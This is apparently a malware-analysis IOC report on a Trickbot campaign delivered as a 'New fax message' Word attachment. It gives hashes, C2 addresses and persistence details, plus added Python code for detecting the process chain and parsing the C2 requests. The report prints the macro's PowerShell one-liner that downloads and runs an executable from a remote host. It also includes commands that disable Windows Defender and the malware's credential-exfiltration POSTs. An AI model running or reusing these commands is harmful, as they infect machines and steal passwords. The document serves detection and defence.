VRad

#Trickbot_051018

Oct 5th, 2018
#IOC #OptiData #VR #Trickbot #W97M #macro #powershell

https://pastebin.com/75KNqwCf
https://radetskiy.wordpress.com/?s=trickbot
https://myonlinesecurity.co.uk/trickbot-via-new-fax-message-malspam/

schema
--------------
email > attach (.doc) > macro > powershell > GET ch.rome (2 URLs, try/catch fallback) > \AppData\Local\Temp\which.exe

email_headers
--------------
Received: from confidentialfax.com ([95.211.242.199])
by mail1.victim.com for <user1@org1.victim.com>;
Fri, 5 Oct 2018 13:45:12 +0300 (EEST) (envelope-from noreply-user1=org1.victim.com@confidentialfax.com)
Received: by confidentialfax.com id hmt0jtcpsj86 for <user1@org1.victim.com>;
Fri, 5 Oct 2018 06:29:00 -0400 (envelope-from <noreply-user1=org1.victim.com@confidentialfax.com>)
Subject: New fax message
From: "Confidential Fax" <noreply@confidentialfax.com>
Date: Fri, 5 Oct 2018 06:29:00 -0400
To: user1@org1.victim.com

files
--------------
SHA-256 03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2
File name Fax.doc
File size 63 KB

SHA-256 b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a
File name ch.rome (PE: "!This program cannot be run in DOS mode.")
File size 557.3 KB

SHA-256 6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c
File name radiance.png (PE, not an image: "!This program cannot be run in DOS mode.")
File size 492 KB

SHA-256 3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22
File name table.png (PE, not an image: "!This program cannot be run in DOS mode.")
File size 492 KB

macro
--------------
powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''C:\Users\admin\AppData\Local\Temp\which.exe'');start-process ''C:\Users\admin\AppData\Local\Temp\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\symbol.bat; start-process 'C:\Users\admin\AppData\Local\Temp\symbol.bat' -windowstyle hidden"

payload_sources
--------------
107.180.51.22 pixandflix{.} com/ch.rome
107.180.51.22 wedannouncements{.} com/ch.rome

activity
**************

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''%tmp%\which.exe'');start-process ''%tmp%\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath %tmp%\symbol.bat; start-process '%tmp%\symbol.bat' -windowstyle hidden"
C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "
"C:\tmp\which.exe"
C:\Windows\SysWOW64\cmd.exe
/c sc stop WinDefend
/c sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\operator\AppData\Roaming\AMNI\which.exe
C:\Windows\SysWOW64\cmd.exe
/c sc stop WinDefend
/c sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe
C:\Windows\system32\cmd.exe
/c ipconfig /all
/c net config workstation
/c net view /all
/c net view /all /domain
/c nltest /domain_trusts
/c nltest /domain_trusts /all_trusts
C:\Windows\system32\svchost.exe
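
Detection sketch for the process chain above. This is an added example, not part of the original paste and not code from the sample. It runs four checks over constructed Sysmon-style process-creation records whose command lines are copied from the proc section: an Office process starting a scripting host, the PowerShell "write a .bat, then start it with a hidden window" pattern from the macro, the WinDefend stop/delete and Set-MpPreference tampering, and a burst of recon commands (ipconfig, net config, net view, nltest) from a single parent. PIDs, parent PIDs and the record field names are assumptions; only svchost.exe pid 2976 is taken from the comp section.

```python
import re

# Constructed Sysmon-style process-creation records. The command lines are
# copied from the proc section of this report; pid/ppid values and the field
# names are assumptions made for the example.
EVENTS = [
    {"pid": 1000, "ppid": 800,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde'},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'''C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''%tmp%\which.exe'');start-process ''%tmp%\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath %tmp%\symbol.bat; start-process '%tmp%\symbol.bat' -windowstyle hidden"'''},
    {"pid": 1200, "ppid": 1100, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "'},
    {"pid": 1300, "ppid": 1200, "image": r"C:\tmp\which.exe", "cmdline": r'"C:\tmp\which.exe"'},
    {"pid": 1301, "ppid": 1300, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend"},
    {"pid": 1302, "ppid": 1300, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend"},
    {"pid": 1303, "ppid": 1300, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
]
# Recon sweep spawned from svchost.exe (pid 2976 taken from the comp section; child pids assumed).
RECON_CMDS = ["ipconfig /all", "net config workstation", "net view /all",
              "net view /all /domain", "nltest /domain_trusts", "nltest /domain_trusts /all_trusts"]
EVENTS += [{"pid": 3000 + i, "ppid": 2976, "image": r"C:\Windows\system32\cmd.exe",
            "cmdline": r"C:\Windows\system32\cmd.exe /c " + c} for i, c in enumerate(RECON_CMDS)]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DEFENDER_TAMPER = re.compile(
    r"sc(?:\.exe)?\s+(?:stop|delete)\s+WinDefend"
    r"|Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.IGNORECASE)
# PowerShell writes a .bat to disk, then launches it with a hidden window (the macro's pattern).
BAT_DROP = re.compile(
    r"out-file\b.*-filepath\s+\S+\.bat.*start-process\b.*-windowstyle\s+hidden",
    re.IGNORECASE | re.DOTALL)
RECON = re.compile(
    r"/c\s+(?:ipconfig\s+/all|net\s+config\s+workstation|net\s+view\b|nltest\s+/domain_trusts)",
    re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of an image path, tolerant of quotes and forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def office_spawns_shell(events):
    """(parent pid, child pid) pairs where an Office process started a scripting host."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and image_name(parent["image"]) in OFFICE and image_name(e["image"]) in SHELLS:
            hits.append((parent["pid"], e["pid"]))
    return hits


def bat_dropper(events):
    """Pids whose command line drops a .bat and starts it hidden."""
    return [e["pid"] for e in events if BAT_DROP.search(e["cmdline"])]


def defender_tampering(events):
    """Pids that stop/delete WinDefend or switch off real-time monitoring."""
    return [e["pid"] for e in events if DEFENDER_TAMPER.search(e["cmdline"])]


def recon_bursts(events, threshold=3):
    """Parent pids that launched at least `threshold` distinct recon commands."""
    seen = {}
    for e in events:
        if RECON.search(e["cmdline"]):
            seen.setdefault(e["ppid"], set()).add(e["cmdline"].lower())
    return sorted(p for p, cmds in seen.items() if len(cmds) >= threshold)


if __name__ == "__main__":
    print("office->shell:", office_spawns_shell(EVENTS))
    print("bat dropper:  ", bat_dropper(EVENTS))
    print("AV tampering: ", defender_tampering(EVENTS))
    print("recon bursts: ", recon_bursts(EVENTS))
```

The recon check keys on the parent rather than on any single command, because ipconfig or net view on their own are routine; six distinct enumeration commands from one svchost.exe within a session is what separates this sweep from admin activity.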

netwrk
--------------
dst_ip host request User-Agent response
107.180.51.22 pixandflix.com GET /ch.rome HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
185.17.123.2 185.17.123.2 GET /radiance.png HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/90 HTTP/1.1 test
37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0

comp
--------------
process pid remote_ip port state
powershell.exe 1568 107.180.51.22 80 ESTABLISHED
svchost.exe 2976 47.52.62.55 443 ESTABLISHED
svchost.exe 2976 192.252.209.44 443 ESTABLISHED
svchost.exe 2976 2.21.89.57 80 ESTABLISHED
svchost.exe 2976 82.146.41.218 447 ESTABLISHED
svchost.exe 3136 200.29.24.36 8082 SYN_SENT
svchost.exe 3384 185.17.123.2 80 ESTABLISHED
svchost.exe 3136 24.130.135.200 80 SYN_SENT
svchost.exe 420 77.37.142.203 8082 SYN_SENT
svchost.exe 3136 177.0.69.68 80 SYN_SENT
svchost.exe 3136 107.175.247.166 443 SYN_SENT
svchost.exe 3136 172.81.135.139 443 SYN_SENT
svchost.exe 3136 200.29.24.36 8082 SYN_SENT

persist
--------------
Task Scheduler
\Msnetcs c:\users\operator\appdata\roaming\amni\which.exe 05.10.2018 10:59

stealing_passwd
**************
POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0
Host: 37.128.229.30
-----------DEAFJJDLMELQCBHP
Content-Disposition: form-data; name="data"

http://www.i.ua|oper|****** (saved passwd)
https://www.ukr.net|11oper|****** (saved passwd)
https://accounts.google.com|oper11.wdma@gmail.com|****** (saved passwd)
https://login.live.com|oper11.wdma@gmail.com|****** (saved passwd)

-----------DEAFJJDLMELQCBHP
Content-Disposition: form-data; name="source"

firefox passwords
-----------DEAFJJDLMELQCBHP--

(!) Firefox passwords only, no Chrome

get_sys_info
**************
POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 37.128.229.30

--Arasfjasu7
Content-Disposition: form-data; name="proclist"

***PROCESS LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
. . .

--Arasfjasu7
Content-Disposition: form-data; name="sysinfo"

***SYSTEMINFO***

Host Name - APM11
OS Name - Microsoft Windows 7 ..........................
OS Version - Service Pack 1
OS Architecture - 64-bit
Product Type - Workstation
Build Type - Multiprocessor Free
Registered Owner - operator
Registered Organization -
. . .
/c ipconfig /all
/c net config workstation
/c net view /all
/c net view /all /domain
/c nltest /domain_trusts
/c nltest /domain_trusts /all_trusts
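
Parser for the two C2 POSTs shown in netwrk, stealing_passwd and get_sys_info. This is an added example, not from the paste and not the sample's own code. It reads the URI as /<gtag>/<hostname>_W<major><minor><build>.<client id>/<command>, an interpretation that the sample itself supports: APM11 is the Host Name in the sysinfo field, and W617601 decodes to Windows 6.1 build 7601, which is the Windows 7 SP1 the sysinfo field reports. Command numbers are labelled only by what this paste shows them carrying (81: Firefox passwords, 90: proclist and sysinfo). The two requests embedded below are constructed from the captures above, with the blank line that separates headers from body restored and the passwords left masked.

```python
import re

# URI reading used here (an interpretation, consistent with the sysinfo field):
#   /<gtag>/<hostname>_W<major><minor><build>.<client id>/<command>[/]
C2_PATH = re.compile(
    r"^/(?P<gtag>[^/]+)/(?P<host>[^_/]+)_W(?P<maj>\d)(?P<min>\d)(?P<build>\d+)"
    r"\.(?P<client>[^/]+)/(?P<cmd>\d+)/?$")
# Only what this paste shows each command number carrying; nothing more is asserted.
SEEN_COMMANDS = {81: "browser credentials (fields 'data', 'source')",
                 90: "process list and systeminfo (fields 'proclist', 'sysinfo')"}


def parse_c2_path(path):
    """Return the URI components, or None when the path is not in this layout."""
    m = C2_PATH.match(path)
    if not m:
        return None
    g = m.groupdict()
    cmd = int(g["cmd"])
    return {"gtag": g["gtag"], "host": g["host"], "client": g["client"], "cmd": cmd,
            "os": f"Windows {g['maj']}.{g['min']} build {g['build']}",
            "carries": SEEN_COMMANDS.get(cmd, "not seen in this sample")}


def parse_request(raw):
    """Split one HTTP POST into method, path, headers and multipart form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    # The /81/ POST carries no Content-Type header, so fall back to the first body line.
    delimiter = "--" + m.group(1) if m else body.lstrip("\n").split("\n", 1)[0]
    parts = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith("--"):  # closing delimiter
            break
        phead, _, pbody = chunk.lstrip("\n").partition("\n\n")
        name = re.search(r'name="([^"]+)"', phead)
        if name:
            parts[name.group(1)] = pbody.strip("\n")
    return {"method": method, "path": path, "headers": headers,
            "c2": parse_c2_path(path), "parts": parts}


def parse_credentials(data_field):
    """Split the 'data' field into (url, user, password) tuples."""
    return [tuple(line.split("|", 2)) for line in data_field.splitlines() if line.count("|") >= 2]


def host_matches_sysinfo(req):
    """The hostname embedded in the URI should equal 'Host Name - ...' in the sysinfo field."""
    m = re.search(r"^Host Name - (\S+)", req["parts"].get("sysinfo", ""), re.M)
    return bool(m and req["c2"] and m.group(1) == req["c2"]["host"])


# Constructed from the captures above: header/body separator restored, passwords masked.
PWGRAB_REQUEST = "\n".join([
    "POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1",
    "Accept: */*", "User-Agent: Mozilla/4.0", "Host: 37.128.229.30", "",
    "-----------DEAFJJDLMELQCBHP",
    'Content-Disposition: form-data; name="data"', "",
    "http://www.i.ua|oper|******",
    "https://www.ukr.net|11oper|******",
    "https://accounts.google.com|oper11.wdma@gmail.com|******",
    "https://login.live.com|oper11.wdma@gmail.com|******", "",
    "-----------DEAFJJDLMELQCBHP",
    'Content-Disposition: form-data; name="source"', "",
    "firefox passwords",
    "-----------DEAFJJDLMELQCBHP--", ""])
SYSINFO_REQUEST = "\n".join([
    "POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1",
    "Content-Type: multipart/form-data; boundary=Arasfjasu7",
    "User-Agent: test", "Host: 37.128.229.30", "",
    "--Arasfjasu7", 'Content-Disposition: form-data; name="proclist"', "",
    "***PROCESS LIST***", "", "[System Process]", "System", "smss.exe",
    "--Arasfjasu7", 'Content-Disposition: form-data; name="sysinfo"', "",
    "***SYSTEMINFO***", "", "Host Name - APM11", "OS Architecture - 64-bit",
    "--Arasfjasu7--", ""])

if __name__ == "__main__":
    for raw in (PWGRAB_REQUEST, SYSINFO_REQUEST):
        r = parse_request(raw)
        print(r["c2"], sorted(r["parts"]))
```

The gtag (ser1005 here) and the three User-Agent values (none, WinHTTP loader/1.0, Mozilla/4.0, test) are the parts worth turning into proxy or IDS signatures; the client id changes per host and the hostname is victim-specific, so neither belongs in a rule.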

# # #
https://www.virustotal.com/#/file/03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2/community
https://www.virustotal.com/#/file/b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a/community
https://www.virustotal.com/#/file/6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c/detection
https://www.virustotal.com/#/file/3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22/detection
https://analyze.intezer.com/#/analyses/0a02c369-9b18-4711-ba78-cb38aaed2184
https://analyze.intezer.com/#/analyses/d2aea4cc-8c6c-4f60-80e1-e946b5f14f64
https://analyze.intezer.com/#/analyses/7f767ab6-9865-441e-a9de-9bdd7c4c6bff